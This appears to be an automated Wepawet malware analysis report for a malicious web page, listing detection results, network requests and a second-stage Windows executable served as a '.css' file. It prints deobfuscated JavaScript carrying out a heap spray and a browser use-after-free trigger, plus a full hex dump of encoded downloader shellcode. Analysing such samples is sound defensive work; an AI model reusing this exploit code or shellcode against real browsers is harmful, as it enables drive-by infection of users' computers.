Wepawet » JavaScript Report for http://cccbbbb.cn/1/02.htm

Analysis report for http://cccbbbb.cn/1/02.htm

Sample Overview

URL	http://cccbbbb.cn/1/02.htm
MD5	1187197e666ccce5d4cc20c0bc271646
Analysis Started	2009-02-23 07:56:24
Report Generated	2009-02-23 07:56:31
Jsand version	1.03.02

Detection results

Detector	Result
Jsand 1.03.02	suspicious

Exploits

No exploits were identified.

Deobfuscation results

Evals

var b = unescape("%" + "u" + "0" + "C" + "0" + "C" + "%" + "u" + "0" + "C" + "0" + "C");
var test99 = yumen;
var yumen = new Array();
Tameeeeee = unescape(ttt.replace(/Game/g, "\x25\x75"));
while (b.length < 0x100000 - (ttt.length * 2 + 0x01020)
/2){b+=b}var lh=b.substring(0,0x100000-(ttt.length*2+0x01020)/2);
for (i = 0; i < 0xC0; i ++ ){
  yumen[i] = lh + Tameeeeee
}
CollectGarbage();
var s1 = unescape("%" + "u" + "0" + "b" + "0" + "b" + "%" + "u" + "0" + "b" + "0" + "b" + 
"kfkfkfkfkfkfkfkfkfkfkfkfk");
var a1 = new Array();
for (var x = 0; x < 1000; x ++ )a1.push(document.createElement("img"));
function ok(){
  o1 = document.createElement("tbody");
  o1.click;
  var o2 = o1.cloneNode();
  o1.clearAttributes();
  o1 = null;
  CollectGarbage();
  for (var x = 0; x < a1.length; x ++ )a1[x].src = s1;
  o2.click
}

(repeated 1 time)

Writes

No writes.

Network Activity

Requests

URL	Status	Content Type
http://cccbbbb.cn/1/02.htm	200	text/html
http://cccbbbb.cn/1/set.js	200	application/x-javascript

Redirects

No redirects.

ActiveX controls

No objects/controls.

Shellcode and Malware

Hexadecimal	ASCII
eb 11 5b 4b 33 c9 b9 96 05 00 00 80 34 0b bc e2 fa eb 05 e8 ea ff ff ff 54 84 bf bc bc d4 bc 9c bc bc d6 bc 43 6c 05 3a b9 bc bc 37 44 57 b9 e2 4f 18 43 6c 54 4a 43 43 43 54 83 bf bc bc 37 44 54 84 bc bc bc 54 f3 bd bc bc 54 fa bc bc bc 54 61 bf bc bc 37 44 54 9e bc bc bc 54 fa bd bc bc 54 8c bc bc bc 54 37 bf bc bc 37 44 54 b0 bc bc bc 54 df bd bc bc 54 a6 bc bc bc 57 e4 ef 37 60 ef d6 fc d4 bc ac bc bc eb 54 0f be bc bc 54 59 bc bc bc e4 7f ef 37 60 ef d6 9c d4 bc ac bc bc eb 54 27 be bc bc 54 71 bc bc bc e4 7f eb 54 82 b8 bc bc 37 44 8f 75 f5 8f 7c 0c 7f 40 4e 12 31 fb 43 e3 7f e7 82 7a bb 04 82 35 e3 bd 82 da 7b fb b9 43 5c 7f 55 2b b8 bc bc e7 3d 50 a8 bd bc bc 37 68 82 7b be df d1 d8 9c 82 7b fe b8 93 df 9c 9e 3f 7e b4 8f 7c ec ec d4 b8 bd bc bc ee ef ec 54 7f bf bc bc 43 6c 37 40 37 7b 3f 7c b4 82 36 a4 38 67 c8 bf fc 57 4a 82 7a bc 9e 8f 6e 82 34 ec bd 3f 50 e8 8f 7c 8f 67 37 70 3f 44 e8 c1 b5 82 35 a0 b4 3f 7c b8 57 4e 37 70 37 65 3f 7f ac 8f 7c 82 7b ff 90 bd bc bc bc ed ef ec ec ec ec ec ec eb ec 54 87 bf bc bc 54 a5 bc bc bc d8 1d b8 bc bc bc 31 1c dc 43 43 43 54 85 bf bc bc 8f 67 ef ef ef ef 43 6c 3c 84 55 c8 b9 3c 84 54 c9 b3 3d c4 b9 2c 2c 2c 2c c8 ba e9 37 50 31 fc b9 43 5c 54 90 43 43 43 7f 54 9a 43 43 43 04 ad bd b8 3c 7e b0 bc 54 a5 43 43 43 8f 7c ec e8 54 e8 bc bc bc ec 54 37 be bc bc 43 6c 8a 3c 80 98 bc cb b6 54 fd be bc bc 8f 43 eb 43 6c 54 47 bd bc bc d4 43 bc bc bc 43 6c 54 5a 42 43 43 ef eb ea 8f 7c ec e8 54 a2 bc bc bc ec 54 e9 be bc bc 43 6c 8a 3c 80 98 bc cb b6 54 b7 be bc bc 8f 43 eb 43 6c e4 e2 e3 e7 7f 57 be e4 7f 54 45 43 43 43 ea eb 3f 50 b4 37 40 d6 b4 eb 82 43 cb a8 54 e1 be bc bc 43 6c 37 40 d4 dd d1 d9 bc d4 f5 f9 fa ce 37 48 05 b4 bc bc bc 4f 1a c9 93 d6 bc 82 43 c8 98 9c 54 98 be bc bc 43 6c 37 44 54 77 bd bc bc 43 6c 87 44 c8 b4 8a 37 f8 98 9c 82 43 bc 82 43 c8 98 a0 54 53 bd bc bc 43 6c 3f 78 ac e3 e2 04 bd bc bc bc 7f d4 d3 d2 bc bc d4 c9 ce d0 d1 57 a9 31 f8 98 b8 ec 54 9c 42 43 43 ec 54 f6 be bc bc 55 5c 42 43 43 54 5a 43 43 43 3f 78 b4 7f d6 d0 d4 d2 c8 d8 d0 57 a9 31 f8 98 b8 ec 54 45 41 43 43 ec 54 9f be bc bc 55 05 42 43 43 54 5a 43 43 43 3f 78 b4 7f d4 8f 8e bc bc d4 c9 cf d9 ce 57 a9 31 f8 98 b8 ec 54 73 41 43 43 ec 54 45 bd bc bc 55 33 42 43 43 54 5a 43 43 43 3f 78 b4 7f d4 df ca cb bc d4 cf d4 d8 d3 57 a9 31 f8 98 b8 ec 54 19 41 43 43 ec 54 73 bd bc bc 55 d9 42 43 43 54 5a 43 43 43 3f 78 b4 7f d4 ca db c4 bc 57 a9 31 f8 98 b8 ec 54 3c 41 43 43 ec 54 16 bd bc bc 55 fc 42 43 43 54 5a 43 43 43 3f 78 b8 7f 54 17 bd bc bc d4 a7 7a fa c5 ec 54 7a bd bc bc 3f 78 b4 7f 54 2b bd bc bc d4 50 2b bf b0 ec 54 0e bd bc bc 3f 78 b4 7f 54 3f bd bc bc d4 16 40 b1 c0 ec 54 22 bd bc bc 3f 78 b4 7f 54 d3 bd bc bc d4 51 ea 53 8a ec 54 36 bd bc bc 3f 78 b4 7f 54 e7 bd bc bc d4 4c 36 b8 e3 ec 54 ca bd bc bc 3f 78 b4 7f 54 4b 42 43 43 d4 c4 d4 67 a0 ec 54 de bd bc bc 3f 78 b4 7f 54 8f bd bc bc d4 c2 64 5e cf ec 54 f2 bd bc bc 3f 78 b4 7f 54 a3 bd bc bc d4 0c f5 91 67 ec 54 86 bd bc bc 3f 78 b4 7f 54 8a 43 43 43 d4 17 e2 27 a2 ec 54 9a bd bc bc 3f 78 b4 7f 54 1b 42 43 43 d4 e5 2b 3d be ec 54 ae bd bc bc 3f 78 b4 7f 54 5f bc bc bc d4 c2 64 5e cf ec 54 42 bc bc bc 3f 78 b4 7f 54 73 bc bc bc d4 22 45 07 89 ec 54 56 bc bc bc 3f 78 b4 7f 54 2e 42 43 43 d4 eb 1c 09 07 ec 54 6a bc bc bc 3f 78 b4 7f 54 c2 42 43 43 d4 a6 c6 a2 be ec 54 7e bc bc bc 3f 78 b4 7f 54 d6 42 43 43 d4 5c e7 8c 28 ec 54 12 bc bc bc 3f 78 b4 7f 54 ea 42 43 43 d4 2b 75 5e 1f ec 54 26 bc bc bc 3f 78 b4 7f 54 fe 42 43 43 d4 d4 98 79 0f ec 54 3a bc bc bc 3f 78 b4 7f 54 eb bc bc bc d4 ce 42 0f aa ec 54 ce bc bc bc 3f 78 b4 7f 54 f8 42 43 43 57 af d6 d9 ec 54 49 47 43 43 ec 54 17 42 43 43 55 09 40 43 43 54 54 43 43 43 7f 54 15 41 43 43 d4 f3 53 f3 b9 ec 54 82 bc bc bc 3f 78 b4 7f 54 b3 bc bc bc d4 32 f2 b2 50 ec 54 96 bc bc bc 3f 78 b4 7f 8f 7c d8 37 fc 8c 39 7c c4 ac 82 37 fc b0 82 37 cc a0 11 82 37 fc b4 7f 57 b7 82 37 fc 88 3f 7c c0 82 37 fc 80 7f dc 8a 37 d0 98 98 8a 37 f9 80 8a 37 e8 94 c4 bf 69 82 37 f6 a4 82 37 e6 9c bf 61 5f 87 f5 82 37 88 37 bf 49 8f 43 8f 7c 40 10 38 7c c8 bb 7d 73 b1 bf 44 57 48 8a 87 c0 98 94 c9 63 82 37 e6 98 bf 61 82 da 37 b0 f7 82 37 e6 a0 bf 61 82 37 b8 37 bf 79 8a 35 f8 98 a0 dd 7f 54 d8 47 43 43 d4 c8 c8 cc 86 93 93 d8 d8 d8 d8 cf cf cf 8d 8e 92 df d2 93 8c 8c 92 df cf cf b1 b6 bc bc bc bc	..[K3.......4... ........T....... ....Cl.:...7DW.. O.ClTJCCCT....7D T....T....T....T a...7DT....T.... T....T7...7DT... .T....T....W..7` .........T....TY ......7`........ .T'...Tq......T. ...7D.u..\|..@N.1 .C....z...5....{ ..C\.U+....=P... .7h.{......{.... ..?~..\|......... .T....Cl7@7{?\|.. 6.8g...WJ.z...n. 4..?P..\|.g7p?D.. ..5..?\|.WN7p7e?. ..\|.{........... .....T....T..... .....1..CCCT.... .g....Cl<.U..<.T ..=..,,,,...7P1. .C\T.CCC.T.CCC.. ..<~..T.CCC.\|..T .....T7...Cl.<.. ...T.....C.ClTG. ...C...ClTZBCC.. ..\|..T.....T.... Cl.<.....T.....C .Cl.....W...TECC C..?P.7@....C..T ....Cl7@........ ..7H.....O...... C...T....Cl7DTw. ..Cl.D...7....C. .C...TS...Cl?x.. ................ .W.1....T.BCC.T. ...U\BCCTZCCC?x. ........W.1....T EACC.T....U.BCCT ZCCC?x.......... ..W.1....TsACC.T E...U3BCCTZCCC?x ............W.1. ...T.ACC.Ts...U. BCCTZCCC?x...... .W.1....T<ACC.T. ...U.BCCTZCCC?x. .T......z...Tz.. .?x..T+....P+... T....?x..T?..... @...T"...?x..T.. ...Q.S..T6...?x. .T.....L6...T... .?x..TKBCC...g.. T....?x..T...... d^..T....?x..T.. ......g.T....?x. .T.CCC...'..T... .?x..T.BCC..+=.. T....?x..T_..... d^..TB...?x..Ts. ..."E...TV...?x. .T.BCC......Tj.. .?x..T.BCC...... T~...?x..T.BCC.\ ..(.T....?x..T.B CC.+u^..T&...?x. .T.BCC...y..T:.. .?x..T......B... T....?x..T.BCCW. ...TIGCC.T.BCCU. @CCTTCCC.T.ACC.. S...T....?x..T.. ...2..P.T....?x. ..\|.7..9\|...7... 7....7...W..7..? \|..7.....7....7. ..7....i.7...7.. .a_...7.7.I.C.\|@ .8\|..}s..DWH.... ..c.7...a..7...7 ...a.7.7.y.5.... .T.GCC.......... ................ ......

Hexadecimal

ASCII

eb 11 5b 4b 33 c9 b9 96  05 00 00 80 34 0b bc e2 
fa eb 05 e8 ea ff ff ff  54 84 bf bc bc d4 bc 9c 
bc bc d6 bc 43 6c 05 3a  b9 bc bc 37 44 57 b9 e2 
4f 18 43 6c 54 4a 43 43  43 54 83 bf bc bc 37 44 
54 84 bc bc bc 54 f3 bd  bc bc 54 fa bc bc bc 54 
61 bf bc bc 37 44 54 9e  bc bc bc 54 fa bd bc bc 
54 8c bc bc bc 54 37 bf  bc bc 37 44 54 b0 bc bc 
bc 54 df bd bc bc 54 a6  bc bc bc 57 e4 ef 37 60 
ef d6 fc d4 bc ac bc bc  eb 54 0f be bc bc 54 59 
bc bc bc e4 7f ef 37 60  ef d6 9c d4 bc ac bc bc 
eb 54 27 be bc bc 54 71  bc bc bc e4 7f eb 54 82 
b8 bc bc 37 44 8f 75 f5  8f 7c 0c 7f 40 4e 12 31 
fb 43 e3 7f e7 82 7a bb  04 82 35 e3 bd 82 da 7b 
fb b9 43 5c 7f 55 2b b8  bc bc e7 3d 50 a8 bd bc 
bc 37 68 82 7b be df d1  d8 9c 82 7b fe b8 93 df 
9c 9e 3f 7e b4 8f 7c ec  ec d4 b8 bd bc bc ee ef 
ec 54 7f bf bc bc 43 6c  37 40 37 7b 3f 7c b4 82 
36 a4 38 67 c8 bf fc 57  4a 82 7a bc 9e 8f 6e 82 
34 ec bd 3f 50 e8 8f 7c  8f 67 37 70 3f 44 e8 c1 
b5 82 35 a0 b4 3f 7c b8  57 4e 37 70 37 65 3f 7f 
ac 8f 7c 82 7b ff 90 bd  bc bc bc ed ef ec ec ec 
ec ec ec eb ec 54 87 bf  bc bc 54 a5 bc bc bc d8 
1d b8 bc bc bc 31 1c dc  43 43 43 54 85 bf bc bc 
8f 67 ef ef ef ef 43 6c  3c 84 55 c8 b9 3c 84 54 
c9 b3 3d c4 b9 2c 2c 2c  2c c8 ba e9 37 50 31 fc 
b9 43 5c 54 90 43 43 43  7f 54 9a 43 43 43 04 ad 
bd b8 3c 7e b0 bc 54 a5  43 43 43 8f 7c ec e8 54 
e8 bc bc bc ec 54 37 be  bc bc 43 6c 8a 3c 80 98 
bc cb b6 54 fd be bc bc  8f 43 eb 43 6c 54 47 bd 
bc bc d4 43 bc bc bc 43  6c 54 5a 42 43 43 ef eb 
ea 8f 7c ec e8 54 a2 bc  bc bc ec 54 e9 be bc bc 
43 6c 8a 3c 80 98 bc cb  b6 54 b7 be bc bc 8f 43 
eb 43 6c e4 e2 e3 e7 7f  57 be e4 7f 54 45 43 43 
43 ea eb 3f 50 b4 37 40  d6 b4 eb 82 43 cb a8 54 
e1 be bc bc 43 6c 37 40  d4 dd d1 d9 bc d4 f5 f9 
fa ce 37 48 05 b4 bc bc  bc 4f 1a c9 93 d6 bc 82 
43 c8 98 9c 54 98 be bc  bc 43 6c 37 44 54 77 bd 
bc bc 43 6c 87 44 c8 b4  8a 37 f8 98 9c 82 43 bc 
82 43 c8 98 a0 54 53 bd  bc bc 43 6c 3f 78 ac e3 
e2 04 bd bc bc bc 7f d4  d3 d2 bc bc d4 c9 ce d0 
d1 57 a9 31 f8 98 b8 ec  54 9c 42 43 43 ec 54 f6 
be bc bc 55 5c 42 43 43  54 5a 43 43 43 3f 78 b4 
7f d6 d0 d4 d2 c8 d8 d0  57 a9 31 f8 98 b8 ec 54 
45 41 43 43 ec 54 9f be  bc bc 55 05 42 43 43 54 
5a 43 43 43 3f 78 b4 7f  d4 8f 8e bc bc d4 c9 cf 
d9 ce 57 a9 31 f8 98 b8  ec 54 73 41 43 43 ec 54 
45 bd bc bc 55 33 42 43  43 54 5a 43 43 43 3f 78 
b4 7f d4 df ca cb bc d4  cf d4 d8 d3 57 a9 31 f8 
98 b8 ec 54 19 41 43 43  ec 54 73 bd bc bc 55 d9 
42 43 43 54 5a 43 43 43  3f 78 b4 7f d4 ca db c4 
bc 57 a9 31 f8 98 b8 ec  54 3c 41 43 43 ec 54 16 
bd bc bc 55 fc 42 43 43  54 5a 43 43 43 3f 78 b8 
7f 54 17 bd bc bc d4 a7  7a fa c5 ec 54 7a bd bc 
bc 3f 78 b4 7f 54 2b bd  bc bc d4 50 2b bf b0 ec 
54 0e bd bc bc 3f 78 b4  7f 54 3f bd bc bc d4 16 
40 b1 c0 ec 54 22 bd bc  bc 3f 78 b4 7f 54 d3 bd 
bc bc d4 51 ea 53 8a ec  54 36 bd bc bc 3f 78 b4 
7f 54 e7 bd bc bc d4 4c  36 b8 e3 ec 54 ca bd bc 
bc 3f 78 b4 7f 54 4b 42  43 43 d4 c4 d4 67 a0 ec 
54 de bd bc bc 3f 78 b4  7f 54 8f bd bc bc d4 c2 
64 5e cf ec 54 f2 bd bc  bc 3f 78 b4 7f 54 a3 bd 
bc bc d4 0c f5 91 67 ec  54 86 bd bc bc 3f 78 b4 
7f 54 8a 43 43 43 d4 17  e2 27 a2 ec 54 9a bd bc 
bc 3f 78 b4 7f 54 1b 42  43 43 d4 e5 2b 3d be ec 
54 ae bd bc bc 3f 78 b4  7f 54 5f bc bc bc d4 c2 
64 5e cf ec 54 42 bc bc  bc 3f 78 b4 7f 54 73 bc 
bc bc d4 22 45 07 89 ec  54 56 bc bc bc 3f 78 b4 
7f 54 2e 42 43 43 d4 eb  1c 09 07 ec 54 6a bc bc 
bc 3f 78 b4 7f 54 c2 42  43 43 d4 a6 c6 a2 be ec 
54 7e bc bc bc 3f 78 b4  7f 54 d6 42 43 43 d4 5c 
e7 8c 28 ec 54 12 bc bc  bc 3f 78 b4 7f 54 ea 42 
43 43 d4 2b 75 5e 1f ec  54 26 bc bc bc 3f 78 b4 
7f 54 fe 42 43 43 d4 d4  98 79 0f ec 54 3a bc bc 
bc 3f 78 b4 7f 54 eb bc  bc bc d4 ce 42 0f aa ec 
54 ce bc bc bc 3f 78 b4  7f 54 f8 42 43 43 57 af 
d6 d9 ec 54 49 47 43 43  ec 54 17 42 43 43 55 09 
40 43 43 54 54 43 43 43  7f 54 15 41 43 43 d4 f3 
53 f3 b9 ec 54 82 bc bc  bc 3f 78 b4 7f 54 b3 bc 
bc bc d4 32 f2 b2 50 ec  54 96 bc bc bc 3f 78 b4 
7f 8f 7c d8 37 fc 8c 39  7c c4 ac 82 37 fc b0 82 
37 cc a0 11 82 37 fc b4  7f 57 b7 82 37 fc 88 3f 
7c c0 82 37 fc 80 7f dc  8a 37 d0 98 98 8a 37 f9 
80 8a 37 e8 94 c4 bf 69  82 37 f6 a4 82 37 e6 9c 
bf 61 5f 87 f5 82 37 88  37 bf 49 8f 43 8f 7c 40 
10 38 7c c8 bb 7d 73 b1  bf 44 57 48 8a 87 c0 98 
94 c9 63 82 37 e6 98 bf  61 82 da 37 b0 f7 82 37 
e6 a0 bf 61 82 37 b8 37  bf 79 8a 35 f8 98 a0 dd 
7f 54 d8 47 43 43 d4 c8  c8 cc 86 93 93 d8 d8 d8 
d8 cf cf cf 8d 8e 92 df  d2 93 8c 8c 92 df cf cf 
b1 b6 bc bc bc bc

..[K3.......4...
........T.......
....Cl.:...7DW..
O.ClTJCCCT....7D
T....T....T....T
a...7DT....T....
T....T7...7DT...
.T....T....W..7`
.........T....TY
......7`........
.T'...Tq......T.
...7D.u..|..@N.1
.C....z...5....{
..C\.U+....=P...
.7h.{......{....
..?~..|.........
.T....Cl7@7{?|..
6.8g...WJ.z...n.
4..?P..|.g7p?D..
..5..?|.WN7p7e?.
..|.{...........
.....T....T.....
.....1..CCCT....
.g....Cl<.U..<.T
..=..,,,,...7P1.
.C\T.CCC.T.CCC..
..<~..T.CCC.|..T
.....T7...Cl.<..
...T.....C.ClTG.
...C...ClTZBCC..
..|..T.....T....
Cl.<.....T.....C
.Cl.....W...TECC
C..?P.7@....C..T
....Cl7@........
..7H.....O......
C...T....Cl7DTw.
..Cl.D...7....C.
.C...TS...Cl?x..
................
.W.1....T.BCC.T.
...U\BCCTZCCC?x.
........W.1....T
EACC.T....U.BCCT
ZCCC?x..........
..W.1....TsACC.T
E...U3BCCTZCCC?x
............W.1.
...T.ACC.Ts...U.
BCCTZCCC?x......
.W.1....T<ACC.T.
...U.BCCTZCCC?x.
.T......z...Tz..
.?x..T+....P+...
T....?x..T?.....
@...T"...?x..T..
...Q.S..T6...?x.
.T.....L6...T...
.?x..TKBCC...g..
T....?x..T......
d^..T....?x..T..
......g.T....?x.
.T.CCC...'..T...
.?x..T.BCC..+=..
T....?x..T_.....
d^..TB...?x..Ts.
..."E...TV...?x.
.T.BCC......Tj..
.?x..T.BCC......
T~...?x..T.BCC.\
..(.T....?x..T.B
CC.+u^..T&...?x.
.T.BCC...y..T:..
.?x..T......B...
T....?x..T.BCCW.
...TIGCC.T.BCCU.
@CCTTCCC.T.ACC..
S...T....?x..T..
...2..P.T....?x.
..|.7..9|...7...
7....7...W..7..?
|..7.....7....7.
..7....i.7...7..
.a_...7.7.I.C.|@
.8|..}s..DWH....
..c.7...a..7...7
...a.7.7.y.5....
.T.GCC..........
................
......

Additional (potential) malware:

URL	Type	Hash	Analysis
http://ddddsss12.cn/00.css	MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit	1ae9f20fa25cd48ca439bff451ea3e4d	Anubis report Virustotal report

Wepawet (alpha)

Analysis report for http://cccbbbb.cn/1/02.htm

Sample Overview

Detection results

Exploits

Deobfuscation results

Evals

Writes

Network Activity

Requests

Redirects

ActiveX controls

Shellcode and Malware